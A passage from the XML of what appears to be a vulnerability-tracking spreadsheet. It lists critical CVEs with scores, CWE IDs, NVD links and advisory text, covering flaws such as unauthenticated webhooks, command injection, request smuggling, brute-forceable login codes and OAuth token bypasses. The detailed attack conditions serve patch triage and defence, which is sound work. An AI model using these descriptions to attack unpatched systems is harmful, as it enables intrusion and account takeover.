          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E653" s="5" t="inlineStr"/>
      <c r="F653" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="inlineStr"/>
      <c r="I653" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L653" s="5" t="inlineStr">
        <is>
          <t>Nextcloud MCP Server is a production-ready MCP server that connects AI assistants to a Nextcloud instance. Prior to 0.117.2, the POST /webhooks/nextcloud endpoint in nextcloud_mcp_server/vector/webhook_receiver.py has no authentication by default because WEBHOOK_SECRET defaults to None and startup validation does not require it. When WEBHOOK_SECRET is unset, handle_nextcloud_webhook() accepts unauthenticated requests. The payload["user"]["uid"] field parsed in nextcloud_mcp_server/vector/webhook_parser.py is attacker-controlled and is used without an authenticated-session cross-check for Qdrant operations, allowing a network attacker to delete or trigger re-indexing of vector embeddings for any user and to destroy the semantic search index by sending forged deletion events. This issue is fixed in version 0.117.2.</t>
        </is>
      </c>
      <c r="M653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55640</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57499</t>
        </is>
      </c>
      <c r="C654" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D654" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E654" s="5" t="inlineStr"/>
      <c r="F654" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="inlineStr"/>
      <c r="I654" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-78</t>
        </is>
      </c>
      <c r="L654" s="5" t="inlineStr">
        <is>
          <t>Liman is open source server management software. Prior to 2.2.2 - 1103, an OS command injection vulnerability in the log rotation configuration endpoint allows an authenticated administrator to execute arbitrary operating system commands on the Liman server. The `ip_address` parameter is embedded directly into a shell command without sanitization, enabling shell escape via single-quote injection. This is fixed in 2.2.2 - 1103.</t>
        </is>
      </c>
      <c r="M654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57499</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58400</t>
        </is>
      </c>
      <c r="C655" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D655" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E655" s="5" t="inlineStr"/>
      <c r="F655" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G655" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H655" s="5" t="inlineStr"/>
      <c r="I655" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="L655" s="5" t="inlineStr">
        <is>
          <t>GeoNetwork is a catalog application to manage spatially referenced resources. Prior to versions 4.4.12 and 4.2.17, the Saxon XSLT processor used to render formatters is configured without secure processing (`FEATURE_SECURE_PROCESSING`) and without disabling Java extension functions (`ALLOW_EXTERNAL_FUNCTIONS`). Any stylesheet loaded by GeoNetwork can therefore invoke
`java.lang.Runtime.exec()` or `java.lang.ProcessBuilder` directly, achieving arbitrary command execution as the GeoNetwork process user. A user with sufficient privileges to upload a formatter can deliver a `.xsl` file containing Java extension call that execute arbitrary OS commands with the privileges of the GeoNetwork process. The issue is patched in GeoNetwork versions 4.4.12 and 4.2.17.</t>
        </is>
      </c>
      <c r="M655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58400</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61800</t>
        </is>
      </c>
      <c r="C656" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D656" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E656" s="5" t="inlineStr"/>
      <c r="F656" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="inlineStr"/>
      <c r="I656" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L656" s="5" t="inlineStr">
        <is>
          <t>Wazuh is an open-source security platform providing unified XDR and SIEM protection for endpoints and cloud workloads. In versions 4.4.0 through 4.14.6, a party holding the cluster key can write, overwrite, or delete arbitrary files under /var/ossec on worker nodes, leading to remote code execution as root. During cluster file synchronization, the non-merged branch of update_master_files_in_worker() moves each staged file to a destination derived only from safe_join(), which confines the path to /var/ossec but never verifies that the file lands in the directory declared by its cluster_item_key. Because the destination check present on the primary node and on the worker's merged branch was not applied, a peer can place files at attacker-chosen locations under /var/ossec, including paths that are executed as root, and the delete branch has the same gap. This is an incomplete fix for CVE-2026-30893, which addressed traversal outside /var/ossec but left this path able to redirect files anywhere within it. This issue is fixed in version 4.14.7.</t>
        </is>
      </c>
      <c r="M656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61800</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62646</t>
        </is>
      </c>
      <c r="C657" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D657" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E657" s="5" t="inlineStr"/>
      <c r="F657" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="inlineStr"/>
      <c r="I657" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J657" s="5" t="inlineStr"/>
      <c r="K657" s="5" t="inlineStr">
        <is>
          <t>CWE-331</t>
        </is>
      </c>
      <c r="L657" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A session identifier is generated using an algorithm with insufficient randomness, resulting in a token with low entropy that can be predicted or brute-forced within a feasible number of attempts. This could allow an unauthenticated remote attacker to derive valid session identifiers and bypass authentication.</t>
        </is>
      </c>
      <c r="M657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62646</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62862</t>
        </is>
      </c>
      <c r="C658" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D658" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E658" s="5" t="inlineStr"/>
      <c r="F658" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="inlineStr"/>
      <c r="I658" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr">
        <is>
          <t>CWE-307, CWE-330</t>
        </is>
      </c>
      <c r="L658" s="5" t="inlineStr">
        <is>
          <t>Typebot is an open-source chatbot builder. In self-hosted versions up to and including 3.17.1, the default passwordless email magic-link authentication is vulnerable to login-code brute forcing that leads to account takeover. The email provider overrides NextAuth's default cryptographically secure token with a 6-digit code generated using Math.random(), reducing the keyspace to 900,000 with a 10-minute expiry, and the code itself is the raw value placed in the magic link. The verification callback enforces no attempt limit, lockout, or CSRF protection, and an incorrect guess does not consume the real code because the adapter returns null on a not-found token, so a valid code survives unlimited guessing within its lifetime. The only rate limiter applies to the code-sending path and is keyed on the client-controlled X-Forwarded-For header, allowing an attacker to request many concurrent live codes for one victim and further raise the odds of a matching guess. As a result, an anonymous attacker who knows a victim's email address can brute-force the callback and obtain an authenticated session as that user with no victim interaction, gaining full access to the victim's bots, results, and connected integration credentials. Deployments configured for OAuth or SSO only, with no email provider, are not affected. This issue is fixed in version 3.18.0</t>
        </is>
      </c>
      <c r="M658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62862</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67593</t>
        </is>
      </c>
      <c r="C659" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D659" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E659" s="5" t="inlineStr"/>
      <c r="F659" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G659" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H659" s="5" t="inlineStr"/>
      <c r="I659" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L659" s="5" t="inlineStr">
        <is>
          <t>A remote attacker can craft an Openwire RemoveSubscriptionInfo command to cause the deletion of a queue on the Artemis broker before the connection authentication and authorization stage or at any time thereafter. 
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67593</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67598</t>
        </is>
      </c>
      <c r="C660" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D660" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E660" s="5" t="inlineStr"/>
      <c r="F660" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="inlineStr"/>
      <c r="I660" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L660" s="5" t="inlineStr">
        <is>
          <t>Emlog Pro through 2.6.23 contains a disabled TLS certificate validation vulnerability in include/service/ai.php that allows network-adjacent attackers to intercept outbound HTTPS requests to configured LLM providers by presenting arbitrary TLS certificates, as CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST are unconditionally disabled across sendStream(), sendImageRequest(), send(), and fetchSearchHtml() with no option to re-enable verification. Attackers can perform man-in-the-middle interception to extract Authorization Bearer API keys from every AI request and inject crafted AI responses that may be acted upon by the tool-call execution pipeline, including the query_database and update_config tool handlers.</t>
        </is>
      </c>
      <c r="M660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67598</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69641</t>
        </is>
      </c>
      <c r="C661" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D661" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E661" s="5" t="inlineStr"/>
      <c r="F661" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G661" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H661" s="5" t="inlineStr"/>
      <c r="I661" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L661" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69641</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70452</t>
        </is>
      </c>
      <c r="C662" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D662" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E662" s="5" t="inlineStr"/>
      <c r="F662" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="inlineStr"/>
      <c r="I662" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr">
        <is>
          <t>CWE-636, CWE-863</t>
        </is>
      </c>
      <c r="L662" s="5" t="inlineStr">
        <is>
          <t>rsync 3.1.0 before 3.5.0 contains an access control bypass vulnerability that allows remote attackers to circumvent hosts deny rules by inducing DNS resolution failures during hostname-based access control evaluation. When a DNS lookup for a hostname-based deny rule fails, the daemon skips the rule rather than defaulting to a deny decision, enabling attackers who can trigger DNS failures to bypass module-level IP access controls and gain unauthorized access to restricted module file trees.</t>
        </is>
      </c>
      <c r="M662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70452</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73069</t>
        </is>
      </c>
      <c r="C663" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D663" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E663" s="5" t="inlineStr"/>
      <c r="F663" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G663" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H663" s="5" t="inlineStr"/>
      <c r="I663" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L663" s="5" t="inlineStr">
        <is>
          <t>Twenty is an open-source CRM (customer relationship management) platform. Prior to 2.15.0, Twenty allowed a workspace administrator with the DATA_MODEL permission to supply settings.asExpression for the system TS_VECTOR field searchVector through PATCH /rest/metadata/fields/:id or the updateOneField GraphQL mutation, causing buildSqlColumnDefinition in packages/twenty-server/src/engine/twenty-orm/workspace-schema-manager/utils/build-sql-column-definition.util.ts to concatenate unescaped input into GENERATED ALWAYS AS (...) and execute arbitrary PostgreSQL statements as the application database user. This issue is fixed in version 2.15.0.</t>
        </is>
      </c>
      <c r="M663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73069</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73253</t>
        </is>
      </c>
      <c r="C664" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D664" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E664" s="5" t="inlineStr"/>
      <c r="F664" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="inlineStr"/>
      <c r="I664" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L664" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to version 7.22, an on-path network attacker with a wildcard certificate for a parent domain can impersonate deeper subdomains to a client using the built-in TLS stack. The mg_tls_verify_cert_san() and mg_tls_verify_cert_cn() functions in src/tls_builtin.c call mg_match(), whose wildcard can cross DNS label boundaries, so a pattern such as *.example.com can match foo.bar.example.com. The resulting hostname verification bypass permits interception and modification of TLS traffic. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="M664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73253</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73256</t>
        </is>
      </c>
      <c r="C665" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D665" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E665" s="5" t="inlineStr"/>
      <c r="F665" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="inlineStr"/>
      <c r="I665" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L665" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, a remote unauthenticated attacker can exploit an HTTP/1.0 reverse-proxy deployment by sending a request with Transfer-Encoding: chunked and conflicting framing. The http_cb() function in src/http.c tests hm.proto.len with an impossible greater-than-eight condition even though mg_http_parse() requires an eight-byte protocol string, so is_http_1_0 is never set. Mongoose consequently processes chunked encoding that an HTTP/1.0 proxy can ignore, enabling request smuggling and unauthorized access or state changes. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="M665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73256</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73257</t>
        </is>
      </c>
      <c r="C666" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D666" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E666" s="5" t="inlineStr"/>
      <c r="F666" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="inlineStr"/>
      <c r="I666" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L666" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Priro to version 7.22, a remote unauthenticated attacker can send an HTTP request containing both Content-Length and Transfer-Encoding: chunked. The cl_count and te_count checks in the mg_http_parse() and http_cb() paths in src/http.c accept both headers and prioritize chunked encoding, while a Content-Length-preferring reverse proxy can use a different request boundary. This CL.TE desynchronization can inject requests that access or modify resources in another user context. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="M666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73257</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73309</t>
        </is>
      </c>
      <c r="C667" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D667" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E667" s="5" t="inlineStr"/>
      <c r="F667" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="inlineStr"/>
      <c r="I667" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="L667" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an authentication bypass vulnerability in the OAuth2 token endpoint that allows unauthenticated attackers to obtain valid token pairs by submitting empty values for client_secret and code_verifier parameters. Attackers can exploit PHP truthy evaluation logic, which treats empty strings as false and skips client secret validation and PKCE code verifier validation, to exchange a valid authorization code for a token pair without proving client identity or holding the PKCE commitment.</t>
        </is>
      </c>
      <c r="M667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73311</t>
        </is>
      </c>
      <c r="C668" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D668" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E668" s="5" t="inlineStr"/>
      <c r="F668" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="inlineStr"/>
      <c r="I668" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J668" s="5" t="inlineStr"/>
      <c r="K668" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L668" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an OAuth2 authorization code reuse vulnerability that allows attackers to obtain unauthorized token pairs by submitting a previously used authorization code. Attackers can exploit the failure to invalidate or mark authorization codes as consumed after initial token issuance to receive an independent token pair for the same user and scopes, bypassing the single-use guarantee of the OAuth2 authorization code flow.</t>
        </is>
      </c>
      <c r="M668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73312</t>
        </is>
      </c>
      <c r="C669" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D669" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E669" s="5" t="inlineStr"/>
      <c r="F669" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="inlineStr"/>
      <c r="I669" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L669" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a refresh token replay vulnerability that allows attackers to reuse a refresh token multiple times by exploiting the failure to mark tokens as consumed when the parent access token has expired. Attackers can repeatedly submit the same refresh token to generate additional independent token pairs, achieving persistent unauthorized access for the token's full lifetime.</t>
        </is>
      </c>
      <c r="M669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73475</t>
        </is>
      </c>
      <c r="C670" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D670" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E670" s="5" t="inlineStr"/>
      <c r="F670" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="inlineStr">
        <is>
          <t>centarro:commerce_paypal</t>
        </is>
      </c>
      <c r="I670" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L670" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization vulnerability in Drupal Commerce PayPal allows Forceful Browsing. This issue affects Commerce PayPal versions: from 0.0.0 to 1.12.0, from 2.0.0 to 2.1.3.</t>
        </is>
      </c>
      <c r="M670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73475</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75156</t>
        </is>
      </c>
      <c r="C671" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D671" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E671" s="5" t="inlineStr"/>
      <c r="F671" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G671" s="5" t="inlineStr">
        <is>
          <t>microsoft, apache, azure</t>
        </is>
      </c>
      <c r="H671" s="5" t="inlineStr"/>
      <c r="I671" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J671" s="5" t="inlineStr"/>
      <c r="K671" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L671" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow FAB provider versions 3.7.3 through 3.8.0 do not validate the issuer or audience of Azure AD `id_token`s during OAuth login. Deployments are affected only when the FAB auth manager is configured with Azure AD as an OAuth provider. Because the signing keys are fetched from Microsoft's **multi-tenant** JWKS endpoint, an `id_token` minted in *any* Azure tenant — including one the attacker creates — passes signature verification, and the username and role assignments are then read from that attacker-controlled token. Anyone able to register an Azure tenant can therefore authenticate to the Airflow UI with no prior access to the deployment.
The fix for **CVE-2026-59243** was incomplete, and this advisory closes the remaining gap: that fix made the provider verify the `id_token` signature, but did not add issuer or audience checks. Operators who already applied the CVE-2026-59243 fix are **still affected and must upgrade again** — 3.7.3 is the release that shipped that fix, so every version containing it falls inside this affected range. Upgrade to apache-airflow-providers-fab `3.8.1` or later.</t>
        </is>
      </c>
      <c r="M671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75160</t>
        </is>
      </c>
      <c r="C672" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D672" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E672" s="5" t="inlineStr"/>
      <c r="F672" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="inlineStr"/>
      <c r="I672" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J672" s="5" t="inlineStr"/>
      <c r="K672" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L672" s="5" t="inlineStr">
        <is>
          <t>An issue in X-Serie Gateway Firmware V6_00_05 allows a remote attacker to escalate privileges via the endpoints /cgi-bin/wwwugw.cgi and /cgi-bin/ugwdownload.cgi.</t>
        </is>
      </c>
      <c r="M672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75160</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
